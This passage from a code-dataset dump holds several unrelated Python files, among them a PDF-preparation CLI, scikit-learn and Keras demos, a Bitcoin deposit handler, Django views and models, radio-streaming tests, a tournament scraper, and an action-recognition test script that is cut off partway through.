record.print_pdf_prep_man()\n\n record_dict = records[item[\"ID\"]]\n record = colrev.record.Record(data=record_dict)\n if (\n colrev.record.RecordState.pdf_needs_manual_preparation\n != record_dict[\"colrev_status\"]\n ):\n return record_dict\n\n file_provenance = record.get_field_provenance(key=\"file\")\n print(\n \"Manual preparation needed:\"\n f\" {colors.RED}{file_provenance['note']}{colors.END}\"\n )\n\n filepath = pdf_prep_man.review_manager.path / Path(record_dict[\"file\"])\n if not filepath.is_file():\n filepath = (\n pdf_prep_man.review_manager.pdf_dir / f\"{record_dict['ID']}.pdf\"\n )\n record.data.update(\n colrev_pdf_id=record.get_colrev_pdf_id(\n review_manager=pdf_prep_man.review_manager, pdf_path=filepath\n )\n )\n if filepath.is_file():\n current_platform = platform.system()\n if current_platform == \"Linux\":\n subprocess.call([\"xdg-open\", filepath])\n else:\n os.startfile(filepath) # type: ignore\n\n # if PDF > 100 pages, we may check on which page we find the title & print\n\n intro_paragraph = (\n \"Prepared?\\n\"\n \" (y)es, \\n\"\n \" (n)o/delete file,\\n\"\n \" (s)kip, (s10) to skip 10 records, or (q)uit,\\n\"\n \" (c)overpage remove, (l)ast page remove, (r)emove page range, \"\n \"(m)etadata needs to be updated\\n\"\n )\n print(intro_paragraph)\n user_selection = \"\"\n valid_selections = [\"y\", \"n\", \"s\", \"q\"]\n while user_selection not in valid_selections:\n user_selection = input(\"Selection: \")\n if user_selection.startswith(\"s\"):\n if user_selection[1:].isdigit():\n nonlocal to_skip\n to_skip = int(user_selection[1:])\n return records\n if \"q\" == user_selection:\n raise QuitPressedException()\n\n if \"m\" == user_selection:\n self.__update_metadata(record=record)\n print(intro_paragraph)\n elif \"c\" == user_selection:\n try:\n pdf_prep_man_operation.extract_coverpage(filepath=filepath)\n except colrev_exceptions.InvalidPDFException:\n pass\n elif \"l\" == user_selection:\n try:\n pdf_prep_man_operation.extract_lastpage(filepath=filepath)\n except colrev_exceptions.InvalidPDFException:\n pass\n elif \"r\" == user_selection:\n range_str = \"\"\n while not re.match(r\"(\\d)+-(\\d)+\", range_str):\n range_str = input('Page range to remove (e.g., \"0-10\"):')\n\n pages_to_exclude = list(\n range(\n int(range_str[: range_str.find(\"-\")]),\n int(range_str[range_str.find(\"-\") + 1 :]),\n )\n )\n try:\n pdf_prep_man_operation.extract_pages(\n filepath=filepath, pages_to_remove=pages_to_exclude\n )\n except colrev_exceptions.InvalidPDFException:\n pass\n\n elif \"y\" == user_selection:\n pdf_prep_man_operation.set_pdf_man_prepared(record=record)\n elif \"n\" == user_selection:\n record.remove_field(key=\"file\")\n record.set_status(\n target_state=colrev.record.RecordState.pdf_needs_manual_retrieval\n )\n if filepath.is_file():\n filepath.unlink()\n else:\n print(\"Invalid selection.\")\n\n else:\n print(f'File does not exist ({record.data[\"ID\"]})')\n\n pdf_prep_man.review_manager.dataset.save_records_dict(records=records)\n\n return records\n\n pdf_prep_man_operation.review_manager.logger.info(\n \"Loading data for pdf_prep_man\"\n )\n pdf_prep_man_data = pdf_prep_man_operation.get_data()\n records = pdf_prep_man_operation.review_manager.dataset.load_records_dict()\n\n for i, item in enumerate(pdf_prep_man_data[\"items\"]):\n if to_skip > 0:\n to_skip -= 1\n continue\n try:\n stat = str(i + 1) + \"/\" + str(pdf_prep_man_data[\"nr_tasks\"])\n records = man_pdf_prep(pdf_prep_man_operation, records, item, stat)\n except QuitPressedException:\n break\n\n pdf_prep_man_operation.review_manager.dataset.save_records_dict(records=records)\n pdf_prep_man_operation.review_manager.dataset.add_record_changes()\n\n if pdf_prep_man_operation.pdfs_prepared_manually():\n if \"y\" == input(\"Create commit (y/n)?\"):\n pdf_prep_man_operation.review_manager.create_commit(\n msg=\"Prepare PDFs manually\",\n manual_author=True,\n )\n else:\n pdf_prep_man_operation.review_manager.logger.info(\n \"Prepare PDFs manually. Afterwards, use colrev pdf-get-man\"\n )\n\n return records\n\n\nclass QuitPressedException(Exception):\n \"\"\"Quit-pressed exception\"\"\"\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"colrev/ops/built_in/pdf_prep_man/pdf_prep_man_cli.py","file_name":"pdf_prep_man_cli.py","file_ext":"py","file_size_in_byte":10279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593845122","text":"# -*- coding: utf-8 -*-\n# Ren Zhang @ ryanzjlib@gmail.com\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n# library\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.externals.six import StringIO\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nimport pydot # make sure you have GraphViz installed and added to Path, see http://www.graphviz.org/Download_windows.php\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\n\n# set up plot style\nsns.set(style=\"whitegrid\")\nplt.rcParams[\"figure.figsize\"] = (16, 9)\n\n# load data\ndata = load_iris()\nX = data.data\ny = data.target\n\n# fit and plot CART trees on different random samples\nrandom_seeds = [1106, 2014, 1998, 36]\n\nfor random_seed in random_seeds:\n print(\"\\n random seed for split the dataset is: {}\".format(random_seed))\n # split dataset\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = random_seed)\n\n # fit a CART tree using information gain as criterial for split\n clf = DecisionTreeClassifier(\n criterion = \"entropy\"\n )\n clf.fit(X_train, y_train)\n\n # generate plot of the tree\n dot_data = StringIO() \n export_graphviz(\n clf, \n out_file = dot_data,\n feature_names = data.feature_names,\n class_names = data.target_names, \n filled=True, \n rounded=True, \n special_characters=True)\n graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]\n graph.write_png(\"iris_dt_entropy_70_percent_train_seed_{}.png\".format(random_seed))\n\n # print out training error and testing error:\n print(\"training classification error is: {}\".format(1-accuracy_score(y_train, clf.predict(X_train))))\n print(\"test classification error is: {}\".format(1-accuracy_score(y_test, clf.predict(X_test))))\n\n# generate a plot\npdf = pd.DataFrame(X, columns = data.feature_names)\npdf[\"species\"] = [data.target_names[i] for i in y]\n\nfigure = sns.lmplot(\n x = 'petal length (cm)', \n y = 'petal width (cm)', \n data = pdf, \n hue = 'species', \n size = 5,\n fit_reg=False)\nfigure.savefig(\"colored_scatter_plot_iris.png\")\n\n\n# fit and plot CART trees on samples with unbalanced target variables\nclass_weights = [[22, 22, 44],\n [22, 44, 22],\n [44, 22, 22],\n [45, 15, 10],\n [15, 45, 10],\n [45, 15, 5],\n [15, 45, 5]]\n\n# set seed to make sure reproducibility\nnp.random.seed(36)\n\nfor class_weight in class_weights:\n # create unbalanced sample\n num_setosa, num_versicolor, num_virginica = class_weight\n setosa_indices = np.random.choice(range(50), size = num_setosa, replace = False)\n versicolor_indices = np.random.choice(range(50, 100), size = num_versicolor, replace = False)\n virginica_indices = np.random.choice(range(100, 150), size = num_virginica, replace = False)\n train_indices = np.concatenate([setosa_indices, versicolor_indices, virginica_indices])\n test_indices = [i for i in range(150) if i not in train_indices]\n y_train = y[train_indices]\n X_train = X[train_indices,:]\n y_test = y[test_indices]\n X_test = X[test_indices,:]\n # fit a CART tree using information gain as criterial for split\n clf = DecisionTreeClassifier(\n criterion = \"entropy\"\n )\n clf.fit(X_train, y_train)\n\n # generate plot of the tree\n dot_data = StringIO() \n export_graphviz(\n clf, \n out_file = dot_data,\n feature_names = data.feature_names,\n class_names = data.target_names, \n filled=True, \n rounded=True, \n special_characters=True)\n graph = pydot.graph_from_dot_data(dot_data.getvalue())[0]\n graph.write_png(\"iris_dt_entropy_num_per_class_{}_{}_{}.png\".format(num_setosa, num_versicolor, num_virginica))\n # print out training error and testing error:\n print(\"\\n setosa_{}_versicolor_{}_virginica_{}\".format(num_setosa, num_versicolor, num_virginica))\n print(\"training classification error is: {}\".format(1-accuracy_score(y_train, clf.predict(X_train))))\n print(\"test classification error is: {}\".format(1-accuracy_score(y_test, clf.predict(X_test)))) \n print(\"confusion matris is:\")\n ct = confusion_matrix(y_test, clf.predict(X_test))\n print(ct)\n print(\"classification error by target class is:\")\n ct_normalized = ct.astype('float') / ct.sum(axis=1)[:, np.newaxis]\n print(1-np.diag(ct_normalized))\n\n\n","sub_path":"MA710/decision_trees/iris_sklearn_dt_demo.py","file_name":"iris_sklearn_dt_demo.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"174947441","text":"import logging\nfrom datetime import timezone, datetime\nfrom decimal import Decimal\n\nfrom django.db.transaction import atomic\n\nfrom api.models import Account, Deposit, Symbol\nfrom crypto.btc import BTC\n\nfrom utils.redis_queue import NotificationsQueue\n\nfrom api.api import BalanceManagementMixin\n\nlogger = logging.getLogger('deposit')\n\n\ndef process_deposit():\n all_deposit_transactions = filter(lambda item: item['category'] == 'receive', BTC.get_transactions())\n symbol = Symbol.objects.get(name='btc')\n bm = BalanceManagementMixin()\n for tx in all_deposit_transactions:\n if tx['confirmations'] > 0 and not Deposit.objects.filter(tx_hash=tx['txid'], address=tx['address']).exists():\n account = Account.objects.filter(private_key=tx['address']).first()\n if account:\n with atomic():\n now = datetime.now(timezone.utc)\n dep = Deposit.objects.create(\n tx_hash=tx['txid'],\n user=account.user,\n created_at=now,\n confirmed_at=now,\n amount=tx['amount'],\n symbol=symbol,\n address=tx['address']\n )\n bm.add_balance(Decimal(tx['amount']), account.user, symbol)\n NotificationsQueue.put(\n {\n 'telegram_id': dep.user.telegram_id,\n 'type': 'deposit',\n 'amount': dep.amount,\n 'symbol': dep.symbol.name\n }\n )\n","sub_path":"trading_api/routines/tasks/crypto/btc/deposit.py","file_name":"deposit.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"413597981","text":"\"\"\"Automatically build a multiconformer residue\"\"\"\nimport numpy as np\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\nfrom string import ascii_uppercase\nfrom . import Structure\nfrom .structure import residue_type\n\ndef parse_args():\n p = argparse.ArgumentParser(description=__doc__)\n p.add_argument(\"structure\", type=str,\n help=\"PDB-file containing structure.\")\n\n # Output options\n p.add_argument(\"-d\", \"--directory\", type=os.path.abspath, default='.',\n metavar=\"\", help=\"Directory to store results.\")\n p.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Be verbose.\")\n args = p.parse_args()\n\n return args\n\n\ndef main():\n args = parse_args()\n try:\n os.makedirs(args.directory)\n except OSError:\n pass\n\n structure = Structure.fromfile(args.structure).reorder()\n\n\n for residue in structure.extract('record',\"ATOM\").extract(\n 'resn', \"HOH\",\"!=\").residue_groups:\n altlocs = sorted(list(set(residue.altloc)))\n resi = residue.resi[0]\n chainid = residue.chain[0]\n tot_rmsd = 0.0\n numlocs = 0\n if len(altlocs) > 1:\n try:\n altlocs.remove('')\n except ValueError:\n pass\n for altloc in altlocs:\n conf1 = residue.extract('altloc',altloc)\n for altloc2 in altlocs:\n if altloc != altloc2:\n conf2 = residue.extract('altloc',altloc2)\n rmsd = conf1.rmsd(conf2)\n tot_rmsd += rmsd\n numlocs += 1\n if numlocs > 0:\n print(resi,chainid,round(tot_rmsd/numlocs,2),len(altlocs))\n else:\n print(resi,chainid,0.0,len(altlocs))\n","sub_path":"src/qfit/get_metrics.py","file_name":"get_metrics.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91199615","text":"'''\n This module provides a insertion sort algorithm implementation\n'''\n\ndef insertion_sort(values):\n '''\n Sort values using the selection sort algorithm\n \n Insertion sort works by selecting each value from the list and insert them\n in their correct position by comparing them to all the element that are already\n sorted.\n '''\n for index, value in enumerate(values[1:], 1):\n # Select a value then palce it on its corret position\n while(index > 0 and values[index - 1] > value):\n values[index], values[index - 1] = values[index - 1], values[index]\n index -= 1\n \n \n \nif __name__ == \"__main__\":\n values = range(10)\n values.reverse()\n print (\"Before: {}\".format(values))\n insertion_sort(values)\n print (\"After: {}\".format(values))","sub_path":"sort_tutorial/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"535989738","text":"# -*- coding: utf-8 -*-\n\nimport Image\nimport tools\nimport os\n\nlogger = tools.get_logger(__name__)\n\nclass HandlingImage(object):\n \n def __init__(self,path,folder_out_title,last_index):\n self.path = path\n self.folder_out_title = folder_out_title\n self.last_index = last_index\n \n def execute(self,index):\n size_thumb = (160,120)\n size_light = (1024,768)\n image = Image.open(self.path)\n filename= str(self.last_index + index).zfill(5)\n image.save(os.path.join(self.folder_out_title,filename + \".jpg\"),\"JPEG\")\n image_light = image.copy()\n image_light.thumbnail(size_light,Image.ANTIALIAS)\n image_light.save(os.path.join(self.folder_out_title, filename+ \"_light.jpg\"),\n \"JPEG\")\n image_thumb = image.copy()\n image_thumb.thumbnail(size_thumb,Image.ANTIALIAS)\n image_thumb.save(os.path.join(self.folder_out_title, filename + \"_thumb.jpg\"),\n \"JPEG\")\n logger.info(u\"Média %s=>%s terminé avec succès\" % (self.path,filename))\n","sub_path":"handlingimage.py","file_name":"handlingimage.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"527908738","text":"#!/usr/bin/env python\nfrom time import sleep, time\nfrom json import loads\nfrom threading import Thread\nimport tty_radio.__main__\nfrom tty_radio.radio import Radio\nfrom tty_radio.stream import mpg_running\nfrom tty_radio.api import Server, Client\n\n\ndef test_obj(): # noqa\n r = Radio()\n print('%02d>>> r:%s' % (0, r))\n print('%02d>>> r.stations:%s' % (1, r.stations))\n assert r.play()[0] is None and not mpg_running()\n r.set('favs')\n print('%02d>>> r.station:%s' % (2, r.station))\n print('%02d>>> r._station:%s' % (3, r._station))\n print('%02d>>> r._station.streams:%s' % (4, r._station.streams))\n assert r.set('favs', 'BAGeL Radio')\n print('%02d>>> Playing' % 5)\n t1 = time()\n assert r.play()[1] is not None\n while r.song is None:\n sleep(1)\n print('%02d>>> Play 1 wait was %s' % (6, int(time() - t1)))\n assert mpg_running()\n print('%02d>>> r.song:%s' % (7, r.song))\n print('%02d>>> Pausing' % 8)\n t1 = time()\n r.pause()\n while not r.is_paused:\n sleep(1)\n print('%02d>>> Pause wait was %s' % (9, int(time() - t1)))\n assert not mpg_running()\n print('%02d>>> Playing' % 10)\n t1 = time()\n assert r.play()[1] is not None\n while r.song is None:\n sleep(1)\n print('%02d>>> Play 2 wait was %s' % (11, int(time() - t1)))\n assert mpg_running()\n print('%02d>>> Stopping' % 12)\n t1 = time()\n r.stop()\n while r.is_playing:\n sleep(1)\n assert not mpg_running()\n print('%02d>>> Stop wait was %s' % (13, int(time() - t1)))\n assert r.set('favs', 'WCPE Classical')\n print('%02d>>> r.stream:%s' % (14, r.stream))\n print('%02d>>> r._stream:%s' % (15, r._stream))\n print('%02d>>> Playing' % 16)\n t1 = time()\n assert r.play()[1] is not None and mpg_running()\n while r._stream.meta_name is None:\n sleep(1)\n print('%02d>>> Play 3 wait was %s' % (17, int(time() - t1)))\n assert r.play()[0] is None\n assert r.set('favs')\n assert r.set('favs', 'WCPE Classical')\n assert not r.set('favs', 'BAGeL Radio')\n print('%02d>>> Stopping' % 18)\n t1 = time()\n r.stop()\n while r.is_playing:\n sleep(1)\n assert not mpg_running()\n print('%02d>>> Stop wait was %s' % (19, int(time() - t1)))\n assert not r.set('ewqrewrwer')\n assert not r.set('favs', 'ewqrewrwer')\n\n\ndef test_api_serv(): # noqa\n r = Radio()\n s = Server('127.0.0.1', 7887, radio=r)\n r = s.index()\n print('%02d>>> s.index:%s' % (0, r))\n assert loads(r)['success']\n r = s.status()\n print('%02d>>> s.status:%s' % (1, r))\n assert loads(r)['success']\n r = s.stations()\n print('%02d>>> s.stations:%s' % (2, r))\n assert loads(r)['success']\n r = s.streams()\n print('%02d>>> s.streams:%s' % (3, r))\n assert loads(r)['success']\n r = s.streams('favs')\n print('%02d>>> s.streams(favs):%s' % (4, r))\n assert loads(r)['success']\n r = s.streams('ewqrewrwer')\n print('%02d>>> s.streams(ewqrewrwer):%s' % (5, r))\n assert not loads(r)['success']\n r = s.set('favs')\n print('%02d>>> s.set(favs):%s' % (6, r))\n assert loads(r)['success']\n r = s.set('ewqrewrwer')\n print('%02d>>> s.set(ewqrewrwer):%s' % (7, r))\n assert not loads(r)['success']\n r = s.set('favs', 'ewqrewrwer')\n print('%02d>>> s.set(favs,ewqrewrwer):%s' % (8, r))\n assert not loads(r)['success']\n r = s.set('favs', 'WCPE Classical')\n print('%02d>>> s.set(favs,WCPE Classical):%s' % (9, r))\n assert loads(r)['success']\n r = s.play()\n print('%02d>>> s.play:%s' % (10, r))\n assert loads(r)['success']\n sleep(10)\n r = s.play()\n print('%02d>>> double s.play:%s' % (11, r))\n assert not loads(r)['success']\n r = s.set('favs', 'BAGeL Radio')\n print('%02d>>> set during play s.set(favs,BAGeL Radio):%s' % (12, r))\n assert not loads(r)['success']\n r = s.pause()\n print('%02d>>> s.pause:%s' % (13, r))\n assert loads(r)['success']\n sleep(2)\n # double pause currently allowed\n # r = s.pause()\n # print('%02d>>> double s.pause:%s' % (14, r))\n # assert not loads(r)['success']:\n r = s.play()\n print('%02d>>> s.play:%s' % (14, r))\n assert loads(r)['success']\n sleep(10)\n r = s.status()\n print('%02d>>> s.status:%s' % (15, r))\n assert loads(r)['success']\n r = s.stop()\n print('%02d>>> s.stop:%s' % (16, r))\n assert loads(r)['success']\n r = s.stop()\n # double stop currently allowed\n # print('%02d>>> double s.stop:%s' % (17, r))\n # assert not loads(r)['success']\n\n\ndef test_api_client(): # noqa\n r = Radio()\n s = Server('127.0.0.1', 7887, radio=r)\n st = Thread(target=s.run)\n st.daemon = True\n st.start()\n sleep(1)\n c = Client('127.0.0.1', 7887)\n r = c.status()\n print('%02d>>> c.status:%s' % (0, r))\n assert r is not None\n r = c.stations()\n print('%02d>>> c.stations:%s' % (1, r))\n assert len(r) > 0\n print('%02d>>> c.streams' % 2)\n r = c.streams()\n assert len(r) > 0\n print('%02d>>> c.streams(favs):' % 3)\n r = c.streams('favs')\n assert len(r) > 0\n print('%02d>>> c.streams(ewqrewrwer):' % 4)\n r = c.streams('ewqrewrwer')\n assert len(r) == 0\n print('%02d>>> c.play(favs,ewqrewrwer)' % 5)\n r = c.play('favs', 'ewqrewrwer')\n assert not r\n r = c.play('favs', 'BAGeL Radio')\n print('%02d>>> c.play(favs,BAGeL Radio):%s' % (6, r))\n assert r\n sleep(10)\n r = c.pause()\n print('%02d>>> c.pause:%s' % (6, r))\n assert r\n r = c.stop()\n print('%02d>>> c.stop:%s' % (7, r))\n assert r\n sleep(2)\n r = c.play('favs', 'WCPE Classical')\n print('%02d>>> c.play(favs,WCPE Classical):%s' % (8, r))\n assert r\n sleep(10)\n r = c.status()\n print('%02d>>> c.status:%s' % (9, r))\n assert r is not None\n r = c.stop()\n print('%02d>>> c.stop():%s' % (10, r))\n assert r\n\n\ndef test_radio_config():\n \"\"\"Check that `radio config` docstring and actual default settings match\"\"\"\n tty_radio.__main__._config_from_docstr(\n tty_radio.__main__.config.__doc__,\n check_against_default=True)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"473364967","text":"from django.db import models\nfrom treebeard.mp_tree import MP_Node\n\nVALUE_TYPE_CHOICES = [\n ('', 'None'),\n ('AutoInt', 'Automaticly Assigned Integer'),\n ('AutoUUID', 'Automaticly Assigned UUID'),\n ('Boolean', 'Boolean'),\n ('Char', 'String'),\n ('Choice', 'List of Choices'),\n ('Credential', 'Credential'),\n ('Date', 'Date'),\n ('DateTime', 'Date and Time'),\n ('Email', 'Email'),\n ('File', 'File Upload Chooser'),\n ('Float', 'Float'),\n ('Image', 'Image Upload Chooser'),\n ('Integer', 'Integer'),\n ('GenericIPAddress', 'IP'),\n ('MultipleChoice', 'List of Choices with the ability to choose more than one'),\n ('MultipleInstance', 'List of Choices that you can have more than one of the same'),\n ('NullBoolean', 'True/False/None'),\n ('Regex', 'Regex'),\n ('Slug', 'Slug'),\n ('Time', 'Time'),\n ('URL', 'URL'),\n ('UserList', 'User List'),\n ('Password', 'Password'),\n ('YesNo', 'Yes/No')\n]\n\nclass ConfigItemAttribute(MP_Node):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=25)\n description = models.TextField(default='', blank=True)\n valueType = models.CharField(max_length=25, choices=VALUE_TYPE_CHOICES, blank=True, default='')\n valuePrompt = models.CharField(max_length=254, blank=True, default='')\n valueDefault = models.TextField(default='', blank=True)\n \n node_order_by = ['name']\n \n def __str__(self):\n return self.name","sub_path":"src/depo_cmdb/models/ConfigItemAttribute.py","file_name":"ConfigItemAttribute.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"387736403","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef scrapeEvent(url):\n print(\"request url is: \" +url +\"\\n\")\n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n\n\n mydivs = soup.find(\"div\", {\"class\": \"event-list\"})\n players = mydivs.find_all(\"li\", recursive=False)\n\n list_of_players = []\n for player in players:\n playerDict = {\n #\"placing\" = 0,\n ##\"name\" = \"0\",\n #\"itcPoints\" = None,\n #\"faction\" = None,\n #\"swissPoints\" = None,\n #\"record\" = []\n }\n player_result = player.find(\"time\")\n playerDict[\"placing\"] = int(player_result.find(\"span\", {\"class\": \"placing\"}).get_text())\n try:\n playerDict[\"itcPoints\"] = float(player_result.find(\"span\", {\"class\": \"itcpts\"}).get_text())\n except:\n # print(player.prettify())\n # print(playerDict)\n playerDict[\"itcPoints\"] = 0.0\n playerInfo= player.find(\"div\", {\"class\": \"info\"})\n #print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n try:\n playerDict[\"name\"] = playerInfo.find(\"h2\").find(\"span\").get_text()\n except:\n playerDict[\"name\"] = playerInfo.find(\"h2\").get_text()\n #print(playerInfo.prettify())\n \n playerDict[\"faction\"] = playerInfo.find(\"p\").get_text().split(\"-\")[0]\n playerDict[\"team\"] = playerInfo.find(\"p\").get_text().split(\"-\")[1]\n playerScores = player.find(\"div\", {\"class\": \"scoresLabel\"}).find(\"ul\").find_all(\"li\", recursive=False)\n playerDict[\"swissPoints\"] = playerScores[0].get_text()\n playerDict[\"wins\"] = []\n playerDict[\"losses\"] = []\n playerDict[\"draws\"] = []\n wins = playerScores[1].find_all(\"span\", {\"style\": \"color:green;\"})\n losses = playerScores[1].find_all(\"span\", {\"style\": \"color:red;\"})\n draws = playerScores[1].find_all(\"span\", {\"style\": \"color:yellow;\"})\n for win in wins:\n playerDict[\"wins\"].append(int(win.get_text()))\n for loss in losses:\n playerDict[\"losses\"].append(int(loss.get_text()))\n for draw in draws:\n playerDict[\"draws\"].append(int(draw.get_text()))\n list_of_players.append(playerDict)\n if len(list_of_players) == 0:\n return False\n if len(list_of_players[0][\"wins\"]) == 0 and len(list_of_players[0][\"losses\"]) == 0:\n return False\n return list_of_players\n\nif __name__ == \"__main__\":\n listOfPlayers = scrapeEvent(\"https://www.bestcoastpairings.com/r/1ved4krt\")\n with open(\"workfile.json\", 'w') as f:\n f.write(json.dumps(listOfPlayers, indent=4))\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"496523657","text":"def Test():\n n=int(input())\n boys=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n m=int(input())\n girls=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n z=min(m,n)\n boys.sort()\n girls.sort()\n parts=[]\n j=0\n if(z==n):\n while(j 100:\n limit = 10\n paginator = Paginator(qs, limit)\n paginator.baseurl = baseurl\n try:\n page = paginator.page(page)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n return page, paginator\n\ndef new(request):\n question = Question.objects.new()\n page, paginator = pagination(question, request, '/?page=')\n context = {'questions': page.object_list, 'paginator': paginator, 'page': page, }\n return render(request, 'list.html', context)\n\ndef popular(request):\n question = Question.objects.popular()\n page, paginator = pagination(question, request, '/popular/?page=')\n context = {'questions': page.object_list, 'paginator': paginator, 'page': page, }\n return render(request, 'popular.html', context)\n\ndef question(request, index):\n quest = get_object_or_404(Question, pk=index)\n if request.method == \"POST\":\n form = AnswerForm(request.POST)\n if form.is_valid():\n form.save(quest.pk)\n url = quest.get_absolute_url()\n return HttpResponseRedirect(url)\n else:\n form = AnswerForm()\n answers = Answer.objects.filter(question = quest)\n context = {'question': quest, 'answers': answers, 'form' : form }\n return render(request, 'question.html', context)\n\ndef ask(request):\n if request.method == \"POST\":\n form = AskForm(request.POST)\n if form.is_valid():\n question = form.save()\n url = question.get_absolute_url()\n return HttpResponseRedirect(url)\n else:\n form = AskForm()\n context = {'form' : form }\n return render(request, 'ask.html', context)\n\ndef test(request, *args, **kwargs):\n return HttpResponse('OK')\n","sub_path":"ask/qa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"170585019","text":"\"\"\" Denoising Auto-Encoder \"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers import Dense, Activation, Reshape, Flatten\n\n\nMODEL_CONV_FILTERS = 8\nMODEL_CONV_KERNEL_SIZE = 4\nMODEL_CONV_STRIDES = 1\nMODEL_CONV_PADDING = 'same'\n\n\ndef build_model(input_shape):\n seq_length = input_shape[0]\n\n # build it!\n model = Sequential()\n\n # conv\n model.add(Conv1D(input_shape=input_shape,\n filters=MODEL_CONV_FILTERS,\n kernel_size=MODEL_CONV_KERNEL_SIZE,\n strides=MODEL_CONV_STRIDES,\n padding=MODEL_CONV_PADDING))\n model.add(Activation('linear'))\n\n # reshape\n model.add(Flatten())\n\n # dense\n model.add(Dense(units=seq_length*MODEL_CONV_FILTERS))\n model.add(Activation('relu'))\n\n # dense\n model.add(Dense(units=128))\n model.add(Activation('relu'))\n\n # dense\n model.add(Dense(units=seq_length*MODEL_CONV_FILTERS))\n model.add(Activation('relu'))\n\n # reshape\n model.add(Reshape(target_shape=(seq_length, MODEL_CONV_FILTERS)))\n\n # conv\n model.add(Conv1D(filters=1,\n kernel_size=MODEL_CONV_KERNEL_SIZE,\n strides=MODEL_CONV_STRIDES,\n padding=MODEL_CONV_PADDING))\n model.add(Activation('linear'))\n\n # compile it!\n model.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['mse', 'mae', 'acc'])\n\n return model","sub_path":"topologies/dae.py","file_name":"dae.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528989351","text":"# Code for \"TDN: Temporal Difference Networks for Efficient Action Recognition\"\n# arXiv: 2012.10071\n# Limin Wang, Zhan Tong, Bin Ji, Gangshan Wu\n# tongzhan@smail.nju.edu.cn\n\nimport os\nimport argparse\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport torch.nn.parallel\nimport torch.optim\nfrom sklearn.metrics import confusion_matrix\nfrom ops.dataset import TSNDataSet\nfrom ops.models import TSN\nfrom ops.transforms import *\nfrom ops import dataset_config\nfrom torch.nn import functional as F\nimport pickle\n\n# options\nparser = argparse.ArgumentParser(description=\"TDN testing on the full validation set\")\nparser.add_argument('dataset', type=str)\n\n# may contain splits\nparser.add_argument('--weights', type=str, default=None)\nparser.add_argument('--test_segments', type=str, default=25)\nparser.add_argument('--modalities', type=str, default='RGB')\nparser.add_argument('--archs', type=str, default='resnet50')\nparser.add_argument('--dense_sample', default=False, action=\"store_true\", help='use dense sample as I3D')\nparser.add_argument('--full_res', default=False, action=\"store_true\",\n help='use full resolution 256x256 for test as in Non-local I3D')\n\nparser.add_argument('--test_crops', type=int, default=1)\nparser.add_argument('--coeff', type=str, default=None)\nparser.add_argument('--batch_size', type=int, default=1)\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 8)')\n\n# for true test\nparser.add_argument('--topk', type=int, default=5)\nparser.add_argument('--test_list', type=str, default=None)\nparser.add_argument('--csv_file', type=str, default=None)\nparser.add_argument('--softmax', default=False, action=\"store_true\", help='use softmax')\n\nparser.add_argument('--max_num', type=int, default=-1)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--crop_fusion_type', type=str, default='avg')\nparser.add_argument('--gpus', nargs='+', type=int, default=None)\nparser.add_argument('--img_feature_dim',type=int, default=256)\nparser.add_argument('--num_set_segments',type=int, default=1,help='TODO: select multiply set of n-frames from a video')\nparser.add_argument('--pretrain', type=str, default='imagenet')\nparser.add_argument('--output_dir',type=str,default=\"./result_file_0605_center16_ssv2\",help='directory for pkl')\nparser.add_argument('--clip_index', type=int, default=0)\n\nargs = parser.parse_args()\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, 